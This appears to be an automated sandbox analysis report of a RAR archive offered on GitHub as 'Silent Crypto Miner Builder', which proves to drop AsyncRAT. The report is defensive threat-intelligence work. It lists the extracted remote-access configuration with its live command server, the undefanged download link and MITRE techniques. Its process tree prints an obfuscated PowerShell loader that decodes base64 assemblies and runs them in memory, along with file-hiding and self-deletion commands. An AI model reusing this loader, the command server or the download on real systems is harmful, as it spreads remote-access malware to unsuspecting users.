asyncrat | hxxps://github[.]com/SilentCryptoMiner/SilentCryptoMiner/releases/download/scm-v3[.]2[.]0/Silent[.]Crypto[.]Miner[.]Builder[.]rar

Analysis

max time kernel
47s
max time network
48s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
21-11-2024 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/SilentCryptoMiner/SilentCryptoMiner/releases/download/scm-v3.2.0/Silent.Crypto.Miner.Builder.rar

Score

10^/10

asyncrat unam defense_evasion discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

unam

windowsignn.theworkpc.com:6606

Mutex

AsyncMutex_5552

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/5372-315-0x00000202214E0000-0x00000202214F6000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5800	powershell.exe
4724	powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	dll.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	startup_str.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	dll.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	startup_str.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	Silent Crypto Miner Builder.exe

Executes dropped EXE 7 IoCs

pid	Process
5972	Silent Crypto Miner Builder.exe
2372	unam.exe
3300	dll.bat.exe
5372	startup_str.bat.exe
3904	unam.exe
5824	dll.bat.exe
5672	startup_str.bat.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5508	cmd.exe
392	cmd.exe
2720	cmd.exe
4428	cmd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\afe7d499-62ef-4286-97b5-a663da47013e.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241121182344.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	Silent Crypto Miner Builder.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	dll.bat.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	dll.bat.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
3432	msedge.exe
3432	msedge.exe
2716	msedge.exe
2716	msedge.exe
3420	identity_helper.exe
3420	identity_helper.exe
5560	msedge.exe
5560	msedge.exe
5972	Silent Crypto Miner Builder.exe
5972	Silent Crypto Miner Builder.exe
3300	dll.bat.exe
3300	dll.bat.exe
3300	dll.bat.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
5800	powershell.exe
5800	powershell.exe
5800	powershell.exe
5372	startup_str.bat.exe
5372	startup_str.bat.exe
5372	startup_str.bat.exe
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe
5824	dll.bat.exe
5824	dll.bat.exe
5824	dll.bat.exe
6108	powershell.exe
6108	powershell.exe
6108	powershell.exe
6108	powershell.exe
6108	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
5672	startup_str.bat.exe
5672	startup_str.bat.exe
5672	startup_str.bat.exe
5220	powershell.exe
5220	powershell.exe
5220	powershell.exe
5372	startup_str.bat.exe
5372	startup_str.bat.exe
5220	powershell.exe
5220	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5720	7zFM.exe
Token: 35	5720	7zFM.exe
Token: SeSecurityPrivilege	5720	7zFM.exe
Token: SeDebugPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeIncreaseQuotaPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeSecurityPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeTakeOwnershipPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeLoadDriverPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeSystemProfilePrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeSystemtimePrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeProfSingleProcessPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeIncBasePriorityPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeCreatePagefilePrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeBackupPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeRestorePrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeShutdownPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeDebugPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeSystemEnvironmentPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeRemoteShutdownPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeUndockPrivilege	5972	Silent Crypto Miner Builder.exe
Token: SeManageVolumePrivilege	5972	Silent Crypto Miner Builder.exe
Token: 33	5972	Silent Crypto Miner Builder.exe
Token: 34	5972	Silent Crypto Miner Builder.exe
Token: 35	5972	Silent Crypto Miner Builder.exe
Token: 36	5972	Silent Crypto Miner Builder.exe
Token: SeDebugPrivilege	3300	dll.bat.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeIncreaseQuotaPrivilege	5800	powershell.exe
Token: SeSecurityPrivilege	5800	powershell.exe
Token: SeTakeOwnershipPrivilege	5800	powershell.exe
Token: SeLoadDriverPrivilege	5800	powershell.exe
Token: SeSystemProfilePrivilege	5800	powershell.exe
Token: SeSystemtimePrivilege	5800	powershell.exe
Token: SeProfSingleProcessPrivilege	5800	powershell.exe
Token: SeIncBasePriorityPrivilege	5800	powershell.exe
Token: SeCreatePagefilePrivilege	5800	powershell.exe
Token: SeBackupPrivilege	5800	powershell.exe
Token: SeRestorePrivilege	5800	powershell.exe
Token: SeShutdownPrivilege	5800	powershell.exe
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeSystemEnvironmentPrivilege	5800	powershell.exe
Token: SeRemoteShutdownPrivilege	5800	powershell.exe
Token: SeUndockPrivilege	5800	powershell.exe
Token: SeManageVolumePrivilege	5800	powershell.exe
Token: 33	5800	powershell.exe
Token: 34	5800	powershell.exe
Token: 35	5800	powershell.exe
Token: 36	5800	powershell.exe
Token: SeIncreaseQuotaPrivilege	5800	powershell.exe
Token: SeSecurityPrivilege	5800	powershell.exe
Token: SeTakeOwnershipPrivilege	5800	powershell.exe
Token: SeLoadDriverPrivilege	5800	powershell.exe
Token: SeSystemProfilePrivilege	5800	powershell.exe
Token: SeSystemtimePrivilege	5800	powershell.exe
Token: SeProfSingleProcessPrivilege	5800	powershell.exe
Token: SeIncBasePriorityPrivilege	5800	powershell.exe
Token: SeCreatePagefilePrivilege	5800	powershell.exe
Token: SeBackupPrivilege	5800	powershell.exe
Token: SeRestorePrivilege	5800	powershell.exe
Token: SeShutdownPrivilege	5800	powershell.exe
Token: SeDebugPrivilege	5800	powershell.exe
Token: SeSystemEnvironmentPrivilege	5800	powershell.exe
Token: SeRemoteShutdownPrivilege	5800	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe
2716	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3300	dll.bat.exe
5372	startup_str.bat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 2012	2716	msedge.exe	83
PID 2716 wrote to memory of 2012	2716	msedge.exe	83
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 1832	2716	msedge.exe	84
PID 2716 wrote to memory of 3432	2716	msedge.exe	85
PID 2716 wrote to memory of 3432	2716	msedge.exe	85
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86
PID 2716 wrote to memory of 1988	2716	msedge.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5152	attrib.exe
4804	attrib.exe
3396	attrib.exe
5128	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/SilentCryptoMiner/SilentCryptoMiner/releases/download/scm-v3.2.0/Silent.Crypto.Miner.Builder.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff99a5146f8,0x7ff99a514708,0x7ff99a514718
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
  2⤵
  PID:1988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:448
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:8
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:3412
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6d9c55460,0x7ff6d9c55470,0x7ff6d9c55480
    3⤵
    PID:628
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
  2⤵
  PID:564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,865738108611238986,17572833745351818585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5560

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3484

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3888

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Silent.Crypto.Miner.Builder.rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5720

C:\Users\Admin\Desktop\Silent Crypto Miner Builder.exe
"C:\Users\Admin\Desktop\Silent Crypto Miner Builder.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5972
- C:\Users\Admin\Desktop\Repo\bin\unam.exe
  "C:\Users\Admin\Desktop\Repo\bin\unam.exe"
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Repo\bin\dll.bat"
  2⤵
  PID:5272
- - C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe
    "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\Desktop\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3300);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe" & exit
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:5508
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB +H "C:\Users\Admin\Desktop\Repo\bin\dll.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
